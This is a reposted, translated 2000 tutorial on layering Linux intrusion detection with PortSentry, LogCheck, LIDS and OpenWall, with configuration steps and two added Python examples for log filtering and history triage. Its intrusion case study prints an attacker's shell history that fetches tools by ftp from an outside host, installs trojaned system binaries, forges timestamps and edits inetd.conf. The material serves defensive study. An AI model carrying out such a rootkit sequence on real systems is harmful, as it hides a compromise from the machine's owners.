
Thursday, 10 November 2011

Linux Intrusion Detection

By David "Del" Elson
Last updated May 22, 2000. Translated by Luther.

Introduction
This article covers several host-based intrusion detection systems for Linux. In particular, we look at the essentials of how to install these packages, what they are good for, and when to use them.

System Security 101
This article assumes some basic knowledge of system security. In particular, I assume that the common security measures against intrusion from the Internet are already in place. Chief among these is a firewall, which determines which TCP or UDP ports users on the Internet can reach on the system. For example, with a few very simple firewall rules on a Web server we can ensure that only port 80, which provides the HTTP service, is open to users.

The system should not run daemons it has no use for. For example, a Web server generally needs only one running process to serve Web pages. Processes that have nothing to do with serving Web pages, such as the RPC/Portmap service, NFS, the X Font server, the DNS name server, and other extraneous or useless applications, should be shut down or disabled. On Red Hat Linux systems this is usually done with a runlevel editor; for example, ntsysv or tksysv can be used to disable the daemons that are not required.

Unused ports can also be closed by editing /etc/inetd.conf. As a typical default, a freshly installed Linux system has many ports open in /etc/inetd.conf. On every system, /etc/inetd.conf should be edited to delete or comment out lines and so disable the ports that serve no purpose; this is the most basic system security measure.

Lines of Defense

Multi-layered System Security
In this section we discuss a multi-layered approach to system security. The layers operate independently, so when some of them are breached the others still provide additional defence. Figure 1 shows such a multi-layered system security model.
Each layer in the diagram provides additional protection beyond the layer above it. For example, the first layer is the firewall; if the firewall fails to block an intrusion attempt from outside, the second layer, PortSentry, provides additional protection. Further in, the LIDS and LogCheck programs protect the system when an intrusion attempt is not caught by the second layer.

Monitoring Current Connections
The first layer of protection behind the firewall is a package that monitors current connection attempts to the host. The PortSentry package (http://www.psionic.com/abacus/portsentry/) provides a simple and useful way to do this.

What PortSentry Does
PortSentry's main job is to monitor activity on selected TCP/IP ports. It monitors and reports on activity on those ports, and one of several responses can be chosen, including refusing further connection attempts. This is an important protective measure, because most attackers run tools to probe a system for vulnerabilities and weaknesses before breaking in. Detecting the probe or port scan allows further connection attempts from the potential intruder to be cut off entirely, stopping further port scans made with hostile intent.

Installing PortSentry
For Red Hat users, an RPM package containing the program is available on Red Hat's ftp server. That site is mirrored worldwide; look on www.redhat.com for the mirror nearest you. I am not sure whether there is a .deb package of PortSentry, but I am confident that the software is available there too. For other Linux users, installing the software from source is fairly simple.

Recommended Configuration
PortSentry has several operating modes, including different stealth modes for UDP and TCP. The mode I chose binds PortSentry to TCP ports that are unused or are considered likely targets of an intrusion attempt. For example, my Web server is scanned around the clock on ports such as port 143 (imap2), port 111 (portmap) and port 23 (telnet), none of which are TCP ports my Internet-facing systems use. The command
portsentry -tcp
run at system startup puts PortSentry into basic TCP mode. Also make sure that the TCP_PORTS line in the PortSentry configuration file portsentry.conf lists the ports you want it to watch.
Response Options
The "Response Options" section of portsentry.conf specifies in detail how PortSentry should react when it detects an unwanted connection. I usually use ipchains to block further connections from the source of the connection. This is configured with a line like the following in portsentry.conf:
KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"
When scans of high ports are being received, the -l option in the line above can be removed so that the further connections are blocked without being logged, which helps conserve system log space.
Monitoring System Logs
Software such as firewalls and PortSentry can effectively monitor or block unwanted connections on some ports. This guards against the most typical "scan, then intrude" style of attack. But when the system has to run particular services (for example the Apache Web Server, or a DNS server running BIND), and an attacker has found a point of attack in that service, these programs unfortunately cannot keep every intruder out. A DNS server running a vulnerable version of BIND will eventually be found by an attacker scanning a wide range of machines for that one port, who will then try to break in through it. Unfortunately, a firewall or PortSentry will treat such intrusion attempts as normal, legitimate connections.
System Log Checking (LogCheck)
LogCheck (http://www.psionic.com/abacus/logcheck/) is software that scans the system log files. LogCheck scans the system logs (on Linux, the files under /var/log/) and notifies the administrator by email when something unusual appears. Unusual messages in the system log files often mean that an attacker is trying to break into the system, or has already done so.
Installing LogCheck
LogCheck has four main configuration files. In the RPM version they live in /etc/logcheck. Usually only two of them, logcheck.ignore and logcheck.violations.ignore, need to be configured. My routine after installing LogCheck is this: let LogCheck run once in its normal mode; this produces an enormous output file, which can simply be deleted. Run LogCheck again 24 hours later, and this time the output contains only the log entries that appeared in between, which is still large but of manageable size. Read this file carefully.
Some of the entries contain specific strings we do not care about. If such a string is part of a "security violation" entry, add it to logcheck.violations.ignore; if it is part of an "unusual system event", add it to logcheck.ignore. Repeat these steps every 12 to 24 hours for a week or so. During this period the filtering rules in the .ignore files are refined repeatedly, until what remains is only what we genuinely care about on our system.
Note that the RPM sets LogCheck to run every hour, but I only need it to run once a day, except on systems that need particular monitoring. To do that, copy the file /etc/cron.hourly/logcheck into /etc/cron so that it runs once a day.
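The tuning loop described above, as an added example that is not LogCheck's own code: a small re-implementation of its filtering passes over constructed syslog lines, showing how entries added to logcheck.violations.ignore and logcheck.ignore narrow the report between runs (the keyword lists and sample lines are constructed, and the three-pass behaviour is an assumption modelled on logcheck.sh).

```python
"""Re-implementation of LogCheck's filtering logic, added as an example (not the
LogCheck code itself), to show how the logcheck.ignore and
logcheck.violations.ignore files narrow the report over successive runs."""
import re

# Constructed sample of new syslog lines since the last run (not from the
# article): a benign login, a PortSentry alert and its ipchains block, an
# hourly cron job, a failed root login and a routine named zone load.
SAMPLE_LOG = [
    "May 22 03:01:02 web1 sshd[412]: Accepted password for alice from 10.0.0.5 port 51234",
    "May 22 03:02:11 web1 portsentry[301]: attackalert: Connect from host: 198.51.100.7/198.51.100.7 to TCP port: 143",
    'May 22 03:02:11 web1 portsentry[301]: attackalert: Host 198.51.100.7 has been blocked via dropped route using command: "/sbin/ipchains -I input -s 198.51.100.7 -j DENY"',
    "May 22 03:05:00 web1 CROND[480]: (root) CMD (run-parts /etc/cron.hourly)",
    "May 22 03:07:45 web1 login[502]: FAILED LOGIN 1 FROM 203.0.113.9 FOR root, Authentication failure",
    "May 22 03:15:00 web1 named[220]: zone example.com loaded (serial 2000052201)",
]

# Keyword lists standing in for logcheck.hacking and logcheck.violations.
# These are constructed for the example, not copied from the LogCheck files.
HACKING = [r"attackalert"]
VIOLATIONS = [r"failed", r"denied", r"refused", r"root"]


def matches(line, patterns):
    """Case-insensitive search, like logcheck's grep -i -f <file>."""
    return any(re.search(p, line, re.IGNORECASE) for p in patterns)


def logcheck_report(lines, violations_ignore=(), ignore=()):
    """Three independent passes over the same batch, modelled on the three grep
    runs in logcheck.sh (an assumption about the tool's exact behaviour).
    Because the passes are independent, a line can appear in more than one
    section: silencing a cron entry needs an entry in both ignore files."""
    return {
        "attack": [l for l in lines if matches(l, HACKING)],
        "violation": [l for l in lines
                      if matches(l, VIOLATIONS) and not matches(l, violations_ignore)],
        "unusual": [l for l in lines if not matches(l, ignore)],
    }


def suggest_pattern(line):
    """Turn one reviewed log line into an ignore pattern: drop the timestamp and
    host (the first four syslog fields), escape the rest and generalise pids,
    addresses and serials so the pattern survives the next run."""
    body = line.split(None, 4)[4]
    return re.sub(r"\d+", r"\\d+", re.escape(body))


# The tuning step the article describes, applied once: the cron line is a
# harmless "violation" (it matched "root"), so it goes into
# logcheck.violations.ignore; the login, cron and zone lines are harmless
# "unusual events", so they go into logcheck.ignore.
VIOLATIONS_IGNORE_TUNED = [suggest_pattern(SAMPLE_LOG[3])]
IGNORE_TUNED = [suggest_pattern(SAMPLE_LOG[i]) for i in (0, 3, 5)]


def remaining_noise(lines, violations_ignore, ignore):
    """Lines still reported that carry no attack or violation keyword,
    i.e. what the next review round should look at."""
    report = logcheck_report(lines, violations_ignore, ignore)
    flagged = set(report["attack"]) | set(report["violation"])
    return [l for l in report["unusual"] if l not in flagged]


if __name__ == "__main__":
    for name, vi, ig in (("first run", (), ()),
                         ("after tuning", VIOLATIONS_IGNORE_TUNED, IGNORE_TUNED)):
        report = logcheck_report(SAMPLE_LOG, vi, ig)
        print(name, {k: len(v) for k, v in report.items()})
```

After one tuning round only the PortSentry alerts and the failed root login remain, and remaining_noise() is empty, which is the stopping condition for the review loop.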

Kernel-based Intrusion Detection
Kernel-based intrusion detection is a rather ingenious new type of Linux intrusion detection system. The main kernel-based intrusion detection system today is LIDS, which can be downloaded from http://www.lids.org/.

What is LIDS?
LIDS is an intrusion detection and prevention system built into the Linux kernel.
LIDS aims to prevent even the superuser, root, from tampering with important parts of the system. Its main features improve system security by preventing direct access to I/O ports and memory, preventing the use of raw disk devices, and protecting the system log files. LIDS also stops certain specific system operations, such as installing a sniffer or modifying the firewall configuration.

LIDS Documentation Project
LIDS is a little more complicated to install than PortSentry and LogCheck, but fortunately the LIDS home page has detailed installation and configuration instructions.
Installing LIDS
First, before installing, we need the most recent LIDS package (I used 0.9) and a suitable kernel version. I am using the 2.2.14-12 kernel downloaded from the Red Hat site, because it contains a number of security patches. You also need the source code for the kernel you are using. LIDS currently targets the 2.2.14 kernel. I installed LIDS on Red Hat Linux 6.2 with the 2.2.14 kernel. Before installing LIDS, I downloaded the latest kernel from ftp.redhat.com and installed it following http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html.

The next step is to upgrade the kernel source. This is how it is done:
rpm -Uhv kernel-source-2.2.14-12.i386.rpm
Then compile and install the lidsadm program:
cd /usr/local/src/security/lids-0.9/lidsadm-0.9
make
make install
Generate a RipeMD-160 password, which will later be compiled into the kernel:
lidsadm -P
Entering the password "anypass" gives the hash "d502d92bfead11d1ef17887c9db07a78108859e8". Next I copied the Red Hat configuration file for my architecture into place under /usr/src/linux:
cd /usr/src/linux/configs/
cp kernel-2.2.12-i686.config ..
Then install LIDS with the following command:
cd /usr/src
patch -p0
Note that the kernel Red Hat ships differs slightly from the standard 2.2.14 kernel released by Linus, because it contains some modified drivers. Likewise, the lids-0.9-2.2.14-redhat.patch file differs slightly from the standard lids-0.9-2.2.14.patch distributed with LIDS, and the latter may not be well suited to a Red Hat system.
Finally, configure, compile and install the kernel:
cd /usr/src/linux
make menuconfig
make dep; make clean
make
make install; make modules; make modules_install
The following listing shows the LIDS options I set while configuring the kernel:
[*] Linux Intrusion Detection System support (EXPERIMENTAL)
--- LIDS features
[ ] Hang up console when raising a securit alert
[*] Security alert when execing unprotected programs before sealing
[ ] Do not execute unprotected programs before sealing LIDS
[*] Enable init children lock feature
[*] Try not to flood logs
(60) Authorised time between two identic logs (seconds)
[*] Allow switching LIDS protections
RipeMD-160 encrypted password: d502d92bfead11d1ef17887c9db07a78108859e8
(3) Number of attempts to submit password
(3) Time to wait after a fail (seconds)
[*] Allow remote users to switch LIDS protections
[ ] Allow any program to switch LIDS protections
[*] Allow reloading config. file
[ ] Hide some known processes
[*] Port Scanner Detector in kernel
[ ] Send security alerts through network
--- Special authorizations
[ ] Allow some known processes to access /dev/mem (xfree, etc.)
[ ] Allow some known processes to access raw disk devices
[ ] Allow some known processes to access io ports
[ ] Allow some known processes to change routes
--- Special UPS
[*] Allow some known processes to unmount devices
Allowed processes: "/etc/rc.d/init.d/halt;/etc/rc.d/init.d/netfs"
[*] Unmounting capability is inherited
[*] Allow some known processes to kill init children
Allowed processes: "/etc/rc.d/init.d/halt"
[*] Killing capability is inherited
As you can see, I do not use a UPS, and I run a server that needs to be accessible remotely, so I configured it as above; in practice every system differs with its environment, so there will be some differences.
Configuring LIDS:
One point deserves special attention: LIDS should be configured before the next reboot of your system! The LIDS configuration file /etc/lids.conf must be managed with lidsadm rather than edited by hand. Running "lidsadm -h" prints help on how to use lidsadm. LIDS provides many examples of protecting files with LIDS, for instance:
lidsadm -A -r /sbin
This command protects the whole /sbin directory and marks it read-only.
My initial LIDS configuration looked like this:
lidsadm -Z
lidsadm -A -r /usr/bin
lidsadm -A -r /bin
lidsadm -A -r /usr/sbin
lidsadm -A -r /sbin
lidsadm -A -r /usr/X11R6/bin
lidsadm -A -r /etc/rc.d
lidsadm -A -r /etc/sysconfig
Once the LIDS configuration file is in place, the system startup files should be modified so that LIDS is started at boot time, which activates the LIDS protections in the kernel. I generally add the lidsadm command to the end of /etc/rc.d/rc.local, which ensures that LIDS does not interfere with the normal startup of the other applications on the system. Here is the script I add to /etc/rc.d/rc.local to start LIDS:
/sbin/lidsadm -I -- -CAP_SYS_MODULE -CAP_SYS_RAWIO -CAP_SYS_ADMIN \
    -CAP_SYS_PTRACE -CAP_NET_ADMIN -CAP_LINUX_IMMUTABLE \
    +INIT_CHILDREN_LOCK
Configuring lilo
As we know, after upgrading the kernel with Red Hat's RPMs, lilo.conf has to be reconfigured so that the new kernel compiled with LIDS boots correctly. After the next reboot LIDS will be running; if you need to stop LIDS to perform some system tasks, use one of the following commands:
/sbin/lidsadm -S -- -LIDS
or
/sbin/lidsadm -S -- -LIDS_GLOBAL
You will need to supply the LIDS password whose RipeMD-160 hash was compiled into the kernel.
You may notice that many of the shutdown scripts no longer work properly. The final shutdown script, /etc/rc.d/init.d/halt, stops all processes and unmounts the file systems, but because of the "+INIT_CHILDREN_LOCK" protection set in rc.local, no other process has permission to kill the other children of init. Also, every 10 minutes you will receive an error message that "rmmod -as" cannot unload modules. This is because once LIDS is active the "-CAP_SYS_MODULE" protection prevents modules from being inserted or removed. Delete the file /etc/cron.d/kmod to stop these error messages.

What Can LIDS Protect?
A quick look through the LIDS documentation reveals a range of features. I consider the following the most important:
CAP_LINUX_IMMUTABLE prevents files and file systems marked "immutable" from being written to;
CAP_NET_ADMIN prevents tampering with the network configuration (for example, modifying the routing table);
CAP_SYS_MODULE prevents kernel modules from being inserted or removed;
CAP_SYS_RAWIO prevents damage to disks or device I/O;
CAP_SYS_ADMIN prevents a wide range of other system functions from being used;
INIT_CHILDREN_LOCK prevents child processes of the init() master process from being tampered with.
All of these features can be enabled at any point with the command "lidsadm -I" and disabled with "lidsadm -S" (which lets the genuine system administrator configure the system), on supplying the LIDS password compiled into the kernel (as a RipeMD-160 hash).

Anatomy of an Intrusion
Lately I have been busy examining some machines that had been broken into, to work out how the intrusions happened and to verify what damage the attackers had done. Fortunately, some attackers are not especially clever and do not manage to wipe their tracks completely after breaking in. An attacker who overflows a buffer in a system daemon gains root, and at that point the host is compromised (this should not have been possible, but whoever installed the Linux system forgot to apply Red Hat's latest buffer overflow patches and left the system running). Some attackers are also careless: once on the host they rush to get a shell, but often forget that their bash commands are recorded, and simply reading /.bash_history reveals exactly what they did on the machine. Here is such a file (slightly edited for simplicity):

mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd
Reading through this, we can see the following actions:
A directory with an unusual name (/usr/lib/...) was created, then the attacker connected to his own host (200.192.58.201, a dial-up user somewhere in Brazil) and downloaded a set of attack tools. The tools were decompressed, and among them were a number of trojaned binaries that were installed on the system, replacing the system's netstat, ps, tcpd, syslogd and pstree commands. These are the programs used to report which processes are running and which ports are open.

What Can We Learn From This?
First, LIDS cannot stop the intrusion itself: the attacker connected to the host and gained root through a buffer overflow.
Once the system had been broken into, though, look at how LIDS would have minimised the damage:
With the CAP_LINUX_IMMUTABLE option, LIDS prevents the trojaned programs from being written into /bin, /usr/bin, /usr/sbin and /usr/lib. These directories are normally marked immutable (chattr +i), so they cannot be modified. Note that even without LIDS a directory can be marked immutable with chattr +i, but with LIDS even root cannot clear the immutable bit. Similarly, if a file is marked with chattr +i, the touch -t command fails. Even the first line, "mkdir /usr/lib/...", fails if the directory is marked immutable. LIDS cannot prevent the break-in, but it prevents the intruder from doing a great deal of damage afterwards. A backdoor program could still be installed on the system, but without the trojaned versions of ps, netstat and pstree the backdoor process can be spotted early and killed. Without LIDS we could not know what the attacker did through the backdoor, and the only remedy would be to reinstall the system.
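The walk-through of the recovered history above, and the account of what CAP_LINUX_IMMUTABLE would have refused, as an added example that is not part of the original article: a triage script that extracts the attacker's actions from the history shown and reports which of them an immutable tree would have denied (the protected-directory list combines the lidsadm -A -r entries with /usr/lib from the text, and the mv directory heuristic is an assumption).

```python
"""Triage of a recovered shell history, added as an example (not from the
article): it pulls out the actions the text walks through (hidden directory,
download host, trojaned binaries, touch -t timestamp forgery, inetd.conf
rewrite) and reports which of them CAP_LINUX_IMMUTABLE would have refused."""
import shlex
from dataclasses import dataclass, field

# Directory trees treated as immutable: the lidsadm -A -r list from the
# configuration section plus /usr/lib, which the text names as well.
# Assumption: CAP_LINUX_IMMUTABLE is enforced on exactly these trees.
PROTECTED = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib",
             "/usr/X11R6/bin", "/etc/rc.d", "/etc/sysconfig")

# The .bash_history shown in the article, used here as the sample input.
SAMPLE_HISTORY = """\
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd
"""


@dataclass
class Findings:
    hidden_dirs: list = field(default_factory=list)        # mkdir with a "..." component
    remote_hosts: list = field(default_factory=list)       # hosts the tools came from
    replaced_files: list = field(default_factory=list)     # files moved into protected trees
    timestomped: list = field(default_factory=list)        # touch -t targets
    configs_rewritten: list = field(default_factory=list)  # files moved over /etc entries


def is_protected(path):
    return any(path == d or path.startswith(d + "/") for d in PROTECTED)


def _commands(history):
    """Split each history line on ';' and tokenise like the shell would."""
    for line in history.splitlines():
        for piece in line.split(";"):
            argv = shlex.split(piece)
            if argv:
                yield argv


def _mv_target(src, dest):
    """Resolve where 'mv src dest' lands: dest is a directory when it ends in
    '/' or is one of the known trees, otherwise it is the new file name."""
    if dest.endswith("/") or dest in PROTECTED:
        return dest.rstrip("/") + "/" + src.rsplit("/", 1)[-1]
    return dest


def triage(history):
    f = Findings()
    for argv in _commands(history):
        cmd, args = argv[0], argv[1:]
        if cmd == "mkdir":
            f.hidden_dirs += [p for p in args if "..." in p.split("/")]
        elif cmd == "ftp" and args:
            f.remote_hosts.append(args[0])
        elif cmd == "mv" and len(args) == 2:
            dest = _mv_target(*args)
            if dest.startswith("/etc/") and not is_protected(dest):
                f.configs_rewritten.append(dest)
            elif is_protected(dest):
                f.replaced_files.append(dest)
        elif cmd == "touch" and "-t" in args:
            f.timestomped += args[args.index("-t") + 2:]
    return f


def denied_by_immutable(f):
    """Actions that fail on an immutable tree, per the text: writing a new
    file, changing its timestamp, and creating a directory inside it."""
    denied = [("write", p) for p in f.replaced_files if is_protected(p)]
    denied += [("touch", p) for p in f.timestomped if is_protected(p)]
    denied += [("mkdir", p) for p in f.hidden_dirs
               if is_protected(p.rsplit("/", 1)[0])]
    return denied
```

Run triage(SAMPLE_HISTORY) and denied_by_immutable() on the result: every binary replacement, every touch -t and the mkdir under /usr/lib are denied, while the /etc/inetd.conf rewrite is not covered by the listed trees and is reported separately for review.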

OpenWall and LIDS: An Additional Layer
Another system similar to LIDS is the OpenWall project (http://www.openwall.com/linux/). OpenWall differs from LIDS in many respects; one particular feature of the OpenWall patch is that it makes the stack non-executable. Quoting the OpenWall README: most buffer overflow exploits rely on overwriting a function's return address on the stack with the address of some arbitrary code, and if the stack is non-executable, buffer overflow vulnerabilities become much harder to exploit. Another buffer overflow technique is to point the return address at a function in libc, usually system(). The patch changes the address at which shared libraries are mmap()ed so that it always contains a zero byte, which makes it impossible to specify such an address in the ASCIIZ strings most attacks have to use. Recently a combined LIDS+OpenWall kernel patch has appeared on the LIDS site, providing the features of both LIDS and OpenWall.

Summary
Using this series of multi-layered security measures on a Linux system prevents a wide range of attacks and also guards against intrusion and tampering. The entry point for an intrusion is the network interface, and both at the network interface and in the system kernel we can prevent others from breaking in.
Be aware of the potential security holes in your system. Any daemon or service running on the system, whether as root or as a non-root user, can be a potential security threat. Be fully prepared to face these threats.
